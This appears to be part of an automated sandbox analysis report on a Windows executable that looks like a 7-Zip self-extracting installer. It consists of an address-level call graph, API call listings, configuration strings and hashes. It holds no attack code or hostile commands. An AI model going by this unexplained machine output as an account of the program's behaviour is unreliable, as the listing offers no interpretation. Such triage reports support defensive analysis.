401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 4043c4 10526->10527 10538 4042ea 10527->10538 10531 40435a 10530->10531 10532 4042ea _wtol 10531->10532 10533 40437b 10532->10533 10533->10000 10535 40438b 10534->10535 10536 4042ea _wtol 10535->10536 10537 4043a3 10536->10537 10537->10006 10539 4042f4 10538->10539 10540 40430f _wtol 10539->10540 10541 404348 10539->10541 10540->10539 10541->9994 10545 402625 10542->10545 10543 402631 lstrcmpW 10544 40264e 10543->10544 10543->10545 10544->9682 10545->10543 10545->10544 10574 410e26 10546->10574 10582 410329 _EH_prolog 10546->10582 10547 40112a 10547->10049 10547->10053 10551 401624 10550->10551 10552 401370 2 API calls 10551->10552 10553 401631 10552->10553 10554 401526 2 API calls 10553->10554 10555 40163a CreateThread 10554->10555 10556 401669 10555->10556 10557 40166e WaitForSingleObject 10555->10557 10981 4012e3 10555->10981 10558 40851f 25 API calls 10556->10558 10559 40168b 10557->10559 10560 4016bd 10557->10560 10558->10557 10563 4016a9 10559->10563 10565 40169a 10559->10565 10561 4016b9 10560->10561 10562 4016c5 GetExitCodeThread 10560->10562 10561->10055 10564 4016dc 10562->10564 10566 408dbf 57 API calls 10563->10566 10564->10561 10564->10565 10567 40170b SetLastError 10564->10567 10565->10561 10568 408dbf 57 API calls 10565->10568 10566->10561 10567->10565 10568->10561 10570 401458 2 API calls 10569->10570 10571 401489 10570->10571 10572 401458 2 API calls 10571->10572 10573 401495 10572->10573 10573->10058 10575 410e38 10574->10575 10581 40d041 3 API calls 10575->10581 10576 410e4c 10579 410e83 10576->10579 10580 40d041 3 API calls 10576->10580 10577 410e60 10577->10579 10598 410ccb 10577->10598 10579->10547 10580->10577 10581->10576 10583 410349 10582->10583 10584 410e26 11 API calls 10583->10584 10585 41036e 10584->10585 10586 410390 10585->10586 10587 410377 10585->10587 10626 4127aa _EH_prolog 10586->10626 10629 40ff49 10587->10629 10611 40e0d0 10598->10611 10600 410cf7 10600->10579 10601 410ce3 10601->10600 10614 40e036 10601->10614 10604 410d30 10605 410dc4 ??3@YAXPAX 10604->10605 10606 410dcf ??3@YAXPAX 10604->10606 10608 410dad memmove 10604->10608 10609 410dd9 memcpy 10604->10609 10605->10600 10606->10600 10608->10604 10610 40d041 3 API calls 10609->10610 10610->10606 10622 40e085 10611->10622 10615 40e080 memcpy 10614->10615 10616 40e043 10614->10616 10615->10604 10617 40e048 ??2@YAPAXI 10616->10617 10618 40e06e 10616->10618 10619 40e070 ??3@YAXPAX 10617->10619 10620 40e058 memmove 10617->10620 10618->10619 10619->10615 10620->10619 10623 40e0c9 10622->10623 10624 40e097 10622->10624 10623->10601 10624->10623 10625 40d00d GetLastError 10624->10625 10625->10624 10637 412525 10626->10637 10964 40fdd9 10629->10964 10659 40fc0a 10637->10659 10782 40fb7b 10659->10782 10783 40cdda ctype 3 API calls 10782->10783 10784 40fb84 10783->10784 10785 40cdda ctype 3 API calls 10784->10785 10786 40fb8c 10785->10786 10787 40cdda ctype 3 API calls 10786->10787 10788 40fb94 10787->10788 10789 40cdda ctype 3 API calls 10788->10789 10790 40fb9c 10789->10790 10791 40cdda ctype 3 API calls 10790->10791 10792 40fba4 10791->10792 10793 40cdda ctype 3 API calls 10792->10793 10794 40fbac 10793->10794 10795 40cdda ctype 3 API calls 10794->10795 10796 40fbb6 10795->10796 10797 40cdda ctype 3 API calls 10796->10797 10798 40fbbe 10797->10798 10799 40cdda ctype 3 API calls 10798->10799 10800 40fbcb 10799->10800 10801 40cdda ctype 3 API calls 10800->10801 10802 40fbd3 10801->10802 10803 40cdda ctype 3 API calls 10802->10803 10804 40fbe0 10803->10804 10805 40cdda ctype 3 API calls 10804->10805 10806 40fbe8 10805->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fbf5 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fbfd 10809->10810 10965 40cdda ctype 3 API calls 10964->10965 10966 40fde7 10965->10966 10982 4012ec 10981->10982 10983 4012ff 10981->10983 10982->10983 10984 4012ee Sleep 10982->10984 10985 401338 10983->10985 10986 40132a EndDialog 10983->10986 10984->10982 10986->10985 10988 40240b 10987->10988 10988->10064 10989->10116 10991 402697 10990->10991 10992 40266f lstrcmpW 10990->10992 10991->10173 10993 402686 10992->10993 10993->10991 10993->10992 10994->10173 10996 402d4b 10995->10996 10997 402d3f 10995->10997 10999 402823 2 API calls 10996->10999 11013 401bdf GetStdHandle WriteFile 10997->11013 11001 402d55 10999->11001 11000 402d46 11012 40269a ??3@YAXPAX ??3@YAXPAX 11000->11012 11002 402d80 11001->11002 11007 40292b 2 API calls 11001->11007 11003 402ad8 3 API calls 11002->11003 11004 402d92 11003->11004 11005 402da0 11004->11005 11006 402db4 11004->11006 11008 408dbf 57 API calls 11005->11008 11009 408dbf 57 API calls 11006->11009 11007->11001 11010 402daf ??3@YAXPAX ??3@YAXPAX 11008->11010 11009->11010 11010->11000 11012->10169 11013->11000 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile

                                                                      Executed Functions

                                                                      Function 00405721 Relevance: 238.1, APIs: 93, Strings: 42, Instructions: 1811keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                        • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                        • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                        • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                        • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                        • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                        • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                        • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                      • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                      • _wtol.MSVCRT ref: 00405825
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                      • _wtol.MSVCRT ref: 00405A25
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                      • wsprintfW.USER32 ref: 00405D2A
                                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                      • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                        • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                      • _wtol.MSVCRT ref: 00405F6B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                      • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                      • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                      • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                      • _wtol.MSVCRT ref: 00406338
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                      • GetKeyState.USER32(00000010), ref: 004063BE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                      • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                      • _wtol.MSVCRT ref: 0040686C
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                        • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                        • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                        • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                        • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                      • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                      • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$@v_$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$H|_$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86$xu_$_
                                                                      • API String ID: 1141480454-4210251009
                                                                      • Opcode ID: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                                      • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                      • Opcode Fuzzy Hash: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
                                                                      • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D
                                                                      Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
